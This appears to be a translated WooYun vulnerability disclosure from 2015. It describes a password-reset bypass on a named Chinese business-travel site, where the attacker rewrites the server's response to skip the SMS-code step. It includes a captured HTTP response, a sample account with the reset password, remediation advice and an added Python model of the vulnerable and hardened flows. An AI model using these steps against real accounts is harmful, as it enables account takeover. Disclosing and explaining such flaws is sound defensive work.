WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2015-07-23: details reported to the vendor, awaiting vendor handling
2015-07-27: vendor confirmed; details visible to the vendor only
2015-08-06: details opened to core white hats and relevant domain experts
2015-08-16: details opened to regular white hats
2015-08-26: details opened to intern white hats
2015-09-10: details opened to the public
Since its founding in 1998, Beijing Jinse Shiji (Golden Century) Business Travel Network Technology Co., Ltd. has built up extensive business-travel service experience and created the "D2D" full-journey business-travel concierge model. By the end of 2014, Golden Century had 36 branches, 1,200 employees and 23 airport and high-speed-rail "Golden Lounge" stations, providing "D2D full-journey concierge service" to more than 2 million members. Within the next 3 to 5 years the number of airport and high-speed-rail Golden Lounges is planned to reach 50, covering provincial capitals and other key cities.
Vulnerability URL:
http://member.jsj.com.cn/findpwd?type=1
1. Enter the target account, then replace the server's response with the "normal" (step-3) response shown below so the page jumps straight to step 3, skipping the verification-code check entirely.
The normal response packet (the step-3 "set new password" page) is as follows:
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Thu, 23 Jul 2015 09:41:15 GMT
Content-Type: text/html
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: MobileCard=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT
Set-Cookie: MobileCardJSJID=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT
Content-Length: 5851

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
 <title>设置新密码</title>
 <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
 <meta http-equiv="X-UA-Compatible" content="IE=Edge" />
 <link href="http://file.jsj.com.cn/css/member/header_footer.css" rel="stylesheet" type="text/css" media="all">
 <link href="http://file.jsj.com.cn/css/member/login.css" rel="stylesheet" type="text/css" media="all">
 <link href="http://file.jsj.com.cn/css/public/public.css" rel="stylesheet" type="text/css" media="all">
 <link rel="shortcut icon" href="http://file.jsj.com.cn/images/public/favicon.ico" type="image/x-icon"/>
 <script type="text/javascript" src='http://file.jsj.com.cn/js/member/login.js'></script>
 <script type="text/javascript" src='http://file.jsj.com.cn/js//jquery.js'></script>
 <script type="text/javascript" src='http://file.jsj.com.cn/js//jsj.js'></script>
 <script type="text/javascript" src='http://file.jsj.com.cn/js/member/member.findpwd2.js'></script>
</head>
<body>
 <div class="top_bg"> <div class="top"> <a href="http://www.jsj.com.cn/"><div class="logo"></div></a> </div> </div>
 <div class="findpwd_box">
  <div class="mt"> <h2>设置新密码</h2> <b></b> </div>
  <div class="mc">
   <div class="step">
    <ul class="reg_step">
     <li class="current"><span></span>验证身份</li>
     <li class="current"><span></span>设置新密码</li>
     <li><span></span>完成</li>
    </ul>
   </div>
   <div class="form">
    <form action='/index/findpwd3' method='post'>
     <div class="item"><span class="label">新登录密码：</span><div class="left"><input id='newpwd1' type="password" name="newpwd1" /><span class="clr"></span><label class="msg-error"></label></div></div>
     <div class="item"><span class="label">确认新密码：</span><div class="left"><input id='newpwd2' type="password" name="newpwd2" /><span class="clr"></span><label class="msg-error"></label></div></div>
     <div class="item"><span class="label"> </span><div class="left user_form"><a name="next" class="btnstep">提交</a></div></div>
    </form>
   </div>
  </div>
 </div>
 <div class="ft">
  <div class="foot">
   <div class="footer_con">
    <div class="contant">
     <ul>
      <li><a href="http://www.jsj.com.cn/BottomLink/about_intro.aspx">关于我们</a><u>|</u></li>
      <!--<li><a href="http://www.jsj.com.cn/BottomLink/D2D/index.html"> D2D服务</a><u>|</u></li>-->
      <li><a href="http://www.jsj.com.cn/sitemap.aspx"> 网站地图</a><u>|</u></li>
      <!--<li><a href="http://gc.jsj.com.cn/bscrm/ebooking/login.aspx">酒店登录</a><u>|</u></li>-->
      <li><a href="http://www.jsj.com.cn/BottomLink/dfdl.aspx">代理中心</a><u>|</u></li>
      <li><a href="http://www.jsj.com.cn/BottomLink/job.aspx">招聘信息</a><u>|</u></li>
      <li><a href="http://www.jsj.com.cn/Card/index.html">VIP服务</a><u>|</u></li>
      <li><a href="http://www.jsj.com.cn/BottomLink/about_department.aspx">联系我们</a><u>|</u></li>
      <li><a href="http://www.jsj.com.cn/BottomLink/flink.aspx">友情链接</a></li>
      <!--<li><a href="http://forum.jsj.com.cn/">会员论坛</a></li>-->
     </ul>
    </div>
    <div class="contant_t">
     <p>ICP备12022924号 京公网安备110105017926号 增值电信业务经营许可证B2-20060235号</p>
     <p>Copyright 1998-2015 jsj.com.cn All Rights Reserved. 北京金色世纪商旅网络科技股份有限公司版权所有</p>
     <p>金色世纪商旅网提供国际航班查询，国际机票预订，国际航班查询时刻表，国际机票价格查询，还有国际航班最近行程规定信息，国际航班实时查询服务供您选择。</p>
    </div>
    <!-- <div class="bottom_jp"> <ul> </ul> </div> -->
    <div class="contant_img" align=center><a href="http://www.jsj.com.cn/promotion/cata-zs/index.htm" target=_blank><img src="http://file.jsj.com.cn/images/public/ico_footer_img01.gif" style="padding-right:5px;" /></a><a href="http://www.itrust.org.cn/yz/pjwx.asp?wm=2582501947" target=_blank><img src="http://file.jsj.com.cn/images/public/ico_footer_img02.gif" style="padding-right:5px;"/></a><a href="https://search.szfw.org/cert/l/CX20120801001603001683" target=_blank><img src="http://file.jsj.com.cn/images/public/ico_footer_img03.gif" style="padding-right:5px;" /></a><a href="http://www.anquan.org/s/www.jsj.com.cn" target=_blank><img src="http://file.jsj.com.cn/images/public/ico_footer_img04.gif" /></a></div>
   </div>
  </div>
 </div>
 <!-- TQ kefu --><script language="JavaScript" src=http://float2006.tq.cn/floatcard?adminid=9556114&sort=0></script>
 <!-- google tongji --><script type="text/javascript"> var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-21387771-1']); _gaq.push(['_setDomainName', 'jsj.com.cn']); _gaq.push(['_trackPageview']); _gaq.push(['_trackPageLoadTime']); (function () { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })();</script>
 <!-- baidu tongji --><script type="text/javascript"> var _bdhmProtocol = (("https:" == document.location.protocol) ? " https://" : " http://"); document.write(unescape("%3Cscript src='" + _bdhmProtocol + "hm.baidu.com/h.js%3Ff73a1947fcd9c6158387fc848ecf4b5a' type='text/javascript'%3E%3C/script%3E"));</script>
</body></html>
2. Enter the new password wooyun123 and submit; the site goes straight to a logged-in state for that account.
High-value ("tuhao") account: 13333333333, password: wooyun123
1. Strengthen the server-side validation logic so that the steps cannot be bypassed by calling them out of order: the server, not the client, must record that the verification-code step succeeded before it accepts the new password.
2. Require identity-verification state to accompany the final submission, for example a server-issued token bound to the session that is created only when the code check passes.
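To make the fix concrete, here is an added example, written for this note in Python and not jsj.com.cn's own code, that models the three-step reset (identify account, verify code, set password) as plain functions over a server-side session dict. The vulnerable variant, like the flow described in the report, accepts a step-3 POST as soon as step 1 has named an account, so a client that rewrites the step-1 response to render the step-3 form never has to pass the code check. The hardened variant keeps a stage marker on the server that only the step-2 success path advances, and step 3 refuses anything else. The class and function names (ResetServer, findpwd1/2/3, attack_skip_step2, legitimate_reset), the account number and the passwords are all constructed for the example.

```python
"""Model of a three-step 'forgot password' flow: identify the account,
verify an SMS/email code, then set the new password.  Hypothetical code
written for this note; it is NOT jsj.com.cn's implementation.

The point it demonstrates: the client's navigation (which page it rendered,
which response it saw) is not evidence that a step happened.  Only state the
server wrote on its own success path can prove that.
"""
import hmac
import secrets


class ResetServer:
    def __init__(self, users, hardened):
        self.users = users          # account -> current password (constructed data)
        self.hardened = hardened
        self.sent_codes = {}        # account -> code "sent" by SMS (simulated)

    # Step 1 (/findpwd?type=1): identify the account and send a code.
    def findpwd1(self, session, account):
        if account not in self.users:
            return 404
        session["reset_account"] = account
        session["reset_stage"] = 1
        self.sent_codes[account] = f"{secrets.randbelow(10**6):06d}"
        return 200

    # Step 2 (/findpwd2): check the code the user typed.
    def findpwd2(self, session, code):
        account = session.get("reset_account")
        if account is None:
            return 400
        if not hmac.compare_digest(code, self.sent_codes.get(account, "")):
            return 403
        session["reset_stage"] = 2   # only the server-side success path sets this
        return 200

    # Step 3 (/index/findpwd3): set the new password.
    def findpwd3(self, session, newpwd1, newpwd2):
        account = session.get("reset_account")
        if account is None or newpwd1 != newpwd2:
            return 400
        # Vulnerable: the only precondition is that step 1 named an account,
        # so a client that skipped the code check (by forging the step-1
        # response to show the step-3 form) is accepted here.
        # Hardened: require the marker that only a successful step 2 writes.
        if self.hardened and session.get("reset_stage") != 2:
            return 403
        self.users[account] = newpwd1
        # Consume the reset state so step 3 cannot be replayed.
        session.pop("reset_stage", None)
        session.pop("reset_account", None)
        self.sent_codes.pop(account, None)
        return 200


def attack_skip_step2(server, account, newpwd):
    """The report's attack: do step 1, never enter a code, POST step 3."""
    session = {}                     # fresh server-side session for the attacker
    if server.findpwd1(session, account) != 200:
        return None
    return server.findpwd3(session, newpwd, newpwd)


def legitimate_reset(server, account, newpwd):
    """Normal flow: the user reads the code off the simulated SMS and enters it."""
    session = {}
    server.findpwd1(session, account)
    server.findpwd2(session, server.sent_codes[account])
    return server.findpwd3(session, newpwd, newpwd)


if __name__ == "__main__":
    for hardened in (False, True):
        srv = ResetServer({"13333333333": "old-password"}, hardened)
        status = attack_skip_step2(srv, "13333333333", "wooyun123")
        print(f"hardened={hardened}: step 3 without step 2 -> {status}, "
              f"password is now {srv.users['13333333333']!r}")
```

Run stand-alone it prints that the vulnerable server returns 200 and the password becomes wooyun123, while the hardened server returns 403 and the old password survives; the legitimate path still works because step 2 wrote the stage marker. If the session store is client-side rather than server-side, the same marker has to become a server-signed, expiring, single-use token carried into the step-3 form, which is what suggestion 2 above asks for.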
Severity: Medium
Vulnerability Rank: 6
Confirmed at: 2015-07-27 20:24
CNVD confirms the vulnerability as described; no direct handling channel with the site's operating organisation has been established yet, pending claim.
None